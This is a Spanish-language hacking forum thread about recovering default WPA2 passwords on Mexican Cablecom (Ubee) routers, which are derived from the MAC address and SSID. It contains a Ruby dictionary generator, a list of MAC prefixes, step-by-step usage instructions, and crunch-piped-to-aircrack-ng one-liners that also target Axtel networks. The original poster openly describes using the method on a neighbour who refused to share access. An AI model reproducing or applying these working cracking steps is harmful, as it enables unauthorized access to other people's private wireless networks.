comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Patron WPA2 cablecomxxxx [MEXICO]

  • 8 Respuestas
  • 14198 Vistas

0 Usuarios y 8 Visitantes están viendo este tema.

Desconectado rush

  • *
  • Underc0der
  • Mensajes: 377
  • Actividad:
    0%
  • Reputación 7
    • Ver Perfil
  • Skype: iruxh1773
« en: Diciembre 04, 2015, 04:07:00 pm »
Que tal, bueno les traigo un patron para sacar la contraseña de WPA2 de manera rapida y sencilla, les cuento, hace poco me quede sin internet y como buen usuario, le pedi la contraseña a mi vecino...(Mentira) y este no accedió, así que me tome la molestia de tratar de conseguir la clave, navegando por internet me encontre con un post de un usuario llamado Mackaber, este usuario lo que explica es como sacar la clave de los modems de cablecom y axtel, que cablecom en su mayoría esta usando la marca UBEE, sin mas les contare de manera resumida lo que dice Mackaber, el buscando mas acerca del router, encontro que los primero 6 dígitos de la MAC estaban registrados en la IEEE, el con la base de datos de las MAC programo un algoritmo para tener un DICCIONARIO y asi poderle hacer un ataque por diccionario después de obtener el handshake, supongo que no me estoy explicando muy bien, pero cuando lleguemos a lo practico lo entenderán mejor, lo que el dedujo fue que para obtener el password WPA2 por defecto, se utilizaban el 2 y 3 par de dígitos de la MAC ejemplo
XX:2F:A5:XX:XX, despues se usaba un par de numeros hexadecimales y por ultimo el nombre de la red.
Ejemplos reales:

MAC: 00:14:A4:00:01:23
SSID: Cablecom0123

Con esos datos conocemos un 80% la contraseña ya que usamos el segundo y tercer par de digitos de la mac para la contraseña, entonces queda de esta manera:
14A4XXXXXX

Con el nombre de la red tenemos lo siguiente:

14A4XX0123

Ahora solo queda decifrar el par de XX que es un par en hexadecimal

es muy simple y rapido si creamos un diccionario en vez de hacerle brute force y lo obtenemos en menos de 5 MIN

este es el codigo que programo Mackaber para hacer el diccionario:

Código: Ruby
  1. # For CablecomXXXX Routers (and probably others from Ubee)
  2. # By Mackaber
  3. # USE $ruby cablecomlistgen.rb "XXXX"
  4.  
  5. def makelist(suffix)
  6.         # Hon Hai prefixes taken from http://standards.ieee.org/develop/regauth/oui/oui.txt
  7.         keys = []
  8.         prefixes = []
  9.         File.readlines("hwlist.txt").each do |l|
  10.                 prefixes.push(l[0..5])
  11.         end
  12.         prefixes.each do |pre|
  13.                 for i in 0..255 do
  14.                         keys.push("#{pre[2..-1]}#{i.to_s(16).upcase.rjust(2,"0")}#{suffix}")
  15.                 end
  16.         end
  17.  
  18.         keys.each do |key|
  19.                 puts key
  20.                 #File.write('file.txt', key+"\n")
  21.                 File.open('file.txt', 'a') do |file|
  22.                         file.puts key
  23.                 end
  24.         end
  25.        
  26.  
  27. end
  28.  
  29. makelist(ARGV[0])

aca la base de datos de acuerdo a la mac,

Citar
0014A4  (base 16)      Hon Hai Precision Ind. Co., Ltd.
0029AF
0016CE  (base 16)      Hon Hai Precision Ind. Co., Ltd.
0016CF  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00197D  (base 16)      Hon Hai Precision Ind. Co., Ltd
00197E  (base 16)      Hon Hai Precision Ind. Co., Ltd
001C25  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
001C26  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
001DD9  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
001E4C  (base 16)      Hon Hai Precision Ind.Co., Ltd.
001F3A  (base 16)      Hon Hai Precision Ind.Co., Ltd.
001FE1  (base 16)      Hon Hai Precision Ind. Co., Ltd.
001FE2  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002268  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002269  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00234D  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00234E  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00242B  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
00242C  (base 16)      Hon Hai Precision Ind. Co., Ltd.
002556  (base 16)      Hon Hai Precision Ind. Co., Ltd.
00265C  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
00265E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0071CC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
083E8E  (base 16)      Hon Hai Precision Ind.Co.Ltd
08EDB9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0C6076  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0C84DC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
0CEEE6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
142D27  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
18F46A  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
1C3E84  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
1C666D  (base 16)      Hon Hai Precision Ind.Co.Ltd
2C8158  (base 16)      Hon Hai Precision Ind. Co.,Ltd
300ED5  (base 16)      Hon Hai Precision Ind.Co.Ltd
342387  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
3859F9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
3C77E6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
4437E6  (base 16)      Hon Hai Precision Ind.Co.Ltd
485AB6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
4C0F6E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
506313  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
543530  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
5C6D20  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
5CAC4C  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
60D819  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
60F494  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
642737  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
689423  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
70188B  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
785968  (base 16)      Hon Hai Precision Ind.Co.,Ltd.
78DD08  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
78E400  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
7CE9D3  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8056F2  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8096CA  (base 16)      Hon Hai Precision Ind Co.,Ltd
844BF5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
889FFA  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
8C7CB5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90004E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9034FC  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90489A  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
904CE5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
906EBB  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
90FBA6  (base 16)      Hon Hai Precision Ind.Co.Ltd
9439E5  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9C2A70  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9CAD97  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
9CD21E  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
A41731  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
B01041  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
B8763F  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
BC8556  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0143D  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C01885  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0CB38  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C0F8DA  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C417FE  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
C44619  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
CCAF78  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
D02788  (base 16)      Hon Hai Precision Ind.Co.Ltd
D87988  (base 16)      Hon Hai Precision Ind. Co., Ltd.
E006E6  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
E4D53D  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
EC55F9  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F07BCB  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F0F002  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F4B7E2  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F80D43  (base 16)      Hon Hai Precision Ind. Co., Ltd.
F82FA8  (base 16)      Hon Hai Precision Ind. Co.,Ltd.
F866D1  (base 16)      Hon Hai Precision Ind. Co., Ltd.

La lista completa esta aca
No tienes permisos para ver links. Registrate o Entra con tu cuenta,

Pero no hace falta tener toda una lista a menos que lo hagamos a ciegas ya que escaneando la red te das cuenta de la MAC

solo tendrias que crear un diccionario para obtener ese par de numero hexadecimales y conociendo el nombre de la red

el post entero esta No tienes permisos para ver links. Registrate o Entra con tu cuenta

Lo probe y de verdad funciona, me tomo 5 min para sacar la contraseña, no se si me explique bien, ya que lo hice de manera rapida.

Saludos!
« Última modificación: Diciembre 04, 2015, 10:09:55 pm por Expermicid »
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5380
  • Actividad:
    76.67%
  • Reputación 31
  • ANTRAX
    • Ver Perfil
    • Underc0de
    • Email
  • Skype: underc0de.org
  • Twitter: @Underc0de
« Respuesta #1 en: Diciembre 04, 2015, 05:09:27 pm »
Que pena no aplique a los routers de Argentina. Hace un tiempo busque este tipo de patron, pero es muy poca la info que encontré.
Muchisimas gracias por el aporte rush!!

Te dejo +c0in

Saludos!
ANTRAX
« Última modificación: Diciembre 04, 2015, 10:10:40 pm por Expermicid »


Desconectado ericortes9012

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #2 en: Mayo 27, 2016, 12:47:58 am »
hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias :)

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #3 en: Mayo 27, 2016, 01:35:26 am »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias :)

Mira la entrada nuevamente y lee! campeon que si no entendiste pregunta ahi se tiene un codigo en Python.

Regards,
Snifer
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1910
  • Actividad:
    15%
  • Reputación 15
    • Ver Perfil
« Respuesta #4 en: Mayo 27, 2016, 12:30:45 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
No tienes permisos para ver links. Registrate o Entra con tu cuenta
hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias :)

Mira la entrada nuevamente y lee! campeon que si no entendiste pregunta ahi se tiene un codigo en Python.

Regards,
Snifer

Es Ruby ;)

Saludos.



Desconectado rush

  • *
  • Underc0der
  • Mensajes: 377
  • Actividad:
    0%
  • Reputación 7
    • Ver Perfil
  • Skype: iruxh1773
« Respuesta #5 en: Mayo 27, 2016, 01:27:09 pm »
Citar
hola que tal amigo buen dia

antes que nada quiero mandar un saludo a todos los integrantes de este foro

soy nuevo en esto de la auditoria wifi y quisiera saber como hacer el diccionario o como hace el procedimiento paso a paso gracias :)

Es facil instala ruby

No tienes permisos para ver links. Registrate o Entra con tu cuenta

copia el codigo de arriba y guardalo como .rb guardalo en una carpeta C:/ruby

crea un archivo con la MAC de tu router, en elemplo de arriba usaria 00:14:A4 y guardalo en un archivo llamado hwlist.txt en la misma carpeta C:/ruby

tiene que quedar de esta manera


ahora abre una cmd y escribe cd C:/ruby

y ejecuta el codigo ruby


y generara el diccionario, se creara un archivo llamado file.txt


ahora solo tendras que concatenar al ultimo de cada string el nombre de la red

14A400nombredelared

EJEMPLO: si la red se llama SSID: Cablecom0123 tendras que poner 0123

14A4000123

en todas las listas del archivo list.txt

así tendrias listo tu diccionario, cuando tengas el handshake podras hacerle brute force y tendras la contraseña en menos de 1 min.

saludos
« Última modificación: Mayo 27, 2016, 01:34:37 pm por rush »
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Desconectado kcdtv

  • *
  • Underc0der
  • Mensajes: 23
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • WiFi Libre
    • Email
« Respuesta #6 en: Mayo 04, 2017, 01:34:48 pm »
  Gracias por dar a conocer este trabajo  :)
Para decifrar las llaves podemos hacerlo también directamente con crunch.
La ventaja es que Crunch está escrito en C y es mucho más rápido que perl a la hora de generar cadenas.

 1) Si queremos descifrar una red AXTEL-XXXX "al vuelo" (sin guardar diccionario)
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 8 8 1234567890ABCDEF + + + -t @@@@XXXX | aircrack-ng  /ruta/fichero/captura/handhsake_axtel.cap -e AXTEL-XXXX -w- En lugar de los XXXX debemos poner los 4 dígitos hexadecimales del eSSID en su orden (AXTEL-XXXX)
 
  2) Si queremos descifrar una red CablecomXXXX
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 10 10 1234567890ABCDEF + + + -t XXXX@@YYYY  | aircrack-ng  /ruta/fichero/captura/handhsake_cable.cap -e CablecomYYYY -w-  En lugar de los XXXX pondremos los dígitos 3,4,5 y 6 del bSSID
  En lugar de los YYYY pondremos los 4 dígitos hexadecimales del eSSID (CabelcomYYYY)

  En ambos casos sería conociendo el eSSID por defecto (el dueño del PA no ha cambiado el nombre de la red)
El crack es literalmente inmediato con redes cablecom (256 posibilidades) y no demorará más de dos minutos con las CPU las más débiles en el caso de axtel
  (65536 posibilidades)

Desconectado rush

  • *
  • Underc0der
  • Mensajes: 377
  • Actividad:
    0%
  • Reputación 7
    • Ver Perfil
  • Skype: iruxh1773
« Respuesta #7 en: Mayo 04, 2017, 02:11:20 pm »
No tienes permisos para ver links. Registrate o Entra con tu cuenta
  Gracias por dar a conocer este trabajo  :)
Para decifrar las llaves podemos hacerlo también directamente con crunch.
La ventaja es que Crunch está escrito en C y es mucho más rápido que perl a la hora de generar cadenas.

 1) Si queremos descifrar una red AXTEL-XXXX "al vuelo" (sin guardar diccionario)
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 8 8 1234567890ABCDEF + + + -t @@@@XXXX | aircrack-ng  /ruta/fichero/captura/handhsake_axtel.cap -e AXTEL-XXXX -w- En lugar de los XXXX debemos poner los 4 dígitos hexadecimales del eSSID en su orden (AXTEL-XXXX)
 
  2) Si queremos descifrar una red CablecomXXXX
Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
crunch 10 10 1234567890ABCDEF + + + -t XXXX@@YYYY  | aircrack-ng  /ruta/fichero/captura/handhsake_cable.cap -e CablecomYYYY -w-  En lugar de los XXXX pondremos los dígitos 3,4,5 y 6 del bSSID
  En lugar de los YYYY pondremos los 4 dígitos hexadecimales del eSSID (CabelcomYYYY)

  En ambos casos sería conociendo el eSSID por defecto (el dueño del PA no ha cambiado el nombre de la red)
El crack es literalmente inmediato con redes cablecom (256 posibilidades) y no demorará más de dos minutos con las CPU las más débiles en el caso de axtel
  (65536 posibilidades)

Excelente, ahora que llegue a casa lo probare para ver la efectividad, gracias por el aporte
No tienes permisos para ver links. Registrate o Entra con tu cuenta


Desconectado unko_francisco

  • *
  • Underc0der
  • Mensajes: 2
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
« Respuesta #8 en: Julio 27, 2017, 06:13:11 pm »
buenas tardes soy nuevo aquí y quisiera saber si alguien me podría ayudar de favor con este tema ya que he!! intentado tal y como esta explicado y he logrado obtener la contraseña pero de algunos modems y me he dado cuenta que ahora estos modems tienen una mac falsa el cual ya es imposible obtener la pass espero y alguien me pueda ayudar ya que he buscado por infinidad de lugares sin ninguna respuesta a lo que me refiero si hay algún nuevo método o una manera de sacar la mac verdadera de antemano un saludo y gracias por muy buen  foro.

 

¿Te gustó el post? COMPARTILO!



Crackear redes WPA/WPA2 con Diccionario ""Movistar""

Iniciado por Jack-C0de

Respuestas: 20
Vistas: 29319
Último mensaje Noviembre 28, 2016, 09:13:35 am
por willfap
Airolib-ng (El "Rapido" Crackeo de WPA/WPA2)

Iniciado por KzZiIi3l

Respuestas: 7
Vistas: 5628
Último mensaje Diciembre 07, 2011, 08:43:42 pm
por KzZiIi3l
Tema muy repetido / Crackeando redes WPA/WPA2 - Auditoría de redes con Wifislax!

Iniciado por Mayk0

Respuestas: 3
Vistas: 4931
Último mensaje Abril 16, 2018, 02:54:48 pm
por hackman2018
Raspberry PI Cracking Station - Rainbow Tables para crackear WPA/WPA2 con Pyrit

Iniciado por Xc0d3's

Respuestas: 2
Vistas: 2022
Último mensaje Septiembre 16, 2017, 02:41:27 am
por Xc0d3's
Así funciona KRACK, la herramienta que permite hackear redes WiFi con WPA2

Iniciado por kpredator1093

Respuestas: 4
Vistas: 3390
Último mensaje Octubre 22, 2017, 08:09:30 pm
por kackerweno